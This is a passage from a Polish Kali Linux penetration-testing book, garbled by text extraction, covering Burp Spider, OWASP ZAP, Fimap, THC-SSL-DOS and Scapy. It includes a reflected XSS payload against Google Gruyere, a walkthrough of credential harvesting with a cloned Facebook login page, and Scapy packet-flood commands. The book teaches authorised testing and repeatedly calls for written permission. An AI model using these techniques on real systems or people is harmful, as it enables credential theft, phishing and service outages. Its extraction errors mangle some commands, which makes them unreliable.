Je eli klikniesz przycisk Forward zobaczysz e przechwycone danie zostaje przekazane dalejdo serwera WWW a serwer odsy a odpowied Co wi cej powiniene roacutewnie zobaczy estrona WWW zosta a za adowana w oknie przegl darki Pami taj jednak e niektoacutere stronyWWW sk adaj si z wielu komponentoacutew i ich za adowanie b dzie wymaga o r cznego prze-kazania wielu da (czyli b dziesz musia wiele razy klika przycisk Forward)

Kolejn ciekaw i u yteczn funkcj pakietu jest Burp Spider czyli robot sieciowy pozwala-j cy na zautomatyzowanie procesu wykrywania i mapowania aplikacji internetowych Zanimb dziesz moacuteg z niego skorzysta musisz najpierw skonfigurowa serwer BURP Proxy dopracy z internetem tak jak to pokazywali my wcze niej Nast pnie w cz modu Burp Spiderktoacutery mo e automatycznie mapowa wszystkie przechwycone dania i wyszukiwa nowepotencjalne cele ataku

Aby u y modu u Burp Spider przejd na kart Spider gdzie zobaczysz domy lne ustawieniakonfiguracyjne robota sieciowego Aby w czy robota kliknij przycisk Spider is paused couruchomi robota i zmieni nazw przycisku na Spider is running (zobacz pierwszy rysunek nanast pnej stronie)

Burp Spider mapuje wszystkie dania przechwycone przez serwer proxy i wy wietla je na karcieTarget Aby zobaczy co zosta o do tej pory przechwycone przejd na kart Target Znajdziesztam list wszystkich przechwyconych przez proxy witryn z ktoacuterymi czy si wybrana przezCiebie witryna podczas adowania Adresy URL wy wietlone w szarym kolorze oznaczaj witrynyktoacuterych nie przegl da e bezpo rednio Adresy URL wyroacute nione czarnym kolorem oznaczajwitryny ktoacutere odwiedzi e bezpo rednio (zobacz drugi rysunek na nast pnej stronie)

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

242

Aby skorzysta z robota sieciowego kliknij wybrany adres URL prawym przyciskiem myszyi z menu podr cznego wybierz polecenie Spider this host

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

243

Je eli teraz przejdziesz na kart Spider to przekonasz si e liczby przetworzonych daw sekcji Spider Status rosn od 0 w goacuter

Gdy Burp napotka jakie formularze poprosi Ci o ich wype nienie lub zignorowanie Je eliwype nisz formularz Burp sprawdzi kolejne strony ktoacutere sta y si dost pne po wype nieniuformularza

Kiedy Spider zako czy dzia anie wroacute na kart Targets i poszukaj strony ktoacuterej adres wybra edla robota sieciowego Kliknij ikon troacutejk ta znajduj c si z lewej strony adresu spowodujeto rozwini cie listy Teraz mo esz zobaczy wyniki dzia ania modu u Spider na pierwszym ry-sunku na nast pnej stronie

Burp wy wietla wszystkie strony i cza ktoacutere znalaz Spider Oproacutecz tego robot przechwytujeroacutewnie g oacutewny katalog hosta style stron internetowych podkatalogi oraz skrypty Java W kolej-nym przyk adzie prezentujemy szereg katalogoacutew przechwyconych z witryny wwwDrchaoscom

Burp pozwala roacutewnie na filtrowanie wynikoacutew Aby skorzysta z tej mo liwo ci kliknij pasekFilter znajduj cy si w goacuternej cz ci okna programu Na ekranie pojawi si rozwijane oknozawieraj ce szereg roacute nych opcji filtrowania (zobacz drugi rysunek na nast pnej stronie)

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

244

Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

245

OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)

ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej

Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3

1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption

4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network

7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP

8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych

Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

246

Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron

ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji

W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere

Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz

pobra go na swoacutej komputer lokalny

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

247

Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334

Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL

Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid

Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

248

Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED

Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)

httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt

Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS

W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

249

Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP

Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji

Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

250

Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4

Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem

Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET

Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie

Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity

bloggercom)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

251

1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks

2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method

Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania

Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y

W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

252

Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook

Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony

Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)

Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-

myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)

Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

253

Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

254

Fimap

Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)

Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia

fimap --install -plugins

Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)

Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

255

ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom

Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie

fimap -u httpwwwthesecuritybloggercom

Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity

bloggercom jest odporna na tego typu ataki

Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

256

i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)

Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe

Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze

dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego

funkcjonowania

Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki

Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based

Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew

Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

257

Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych

Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu

W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux

Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej

THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

258

Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca

thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept

W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej

Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

259

ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych

Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece

W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia

send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)

Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

260

Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy

Nieprawid owa wersja protoko u IP

send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)

Nieprawid owa suma kontrolna pakietu TCP

send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)

send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)

send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)

Ustawiona tylko flaga FIN

send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)

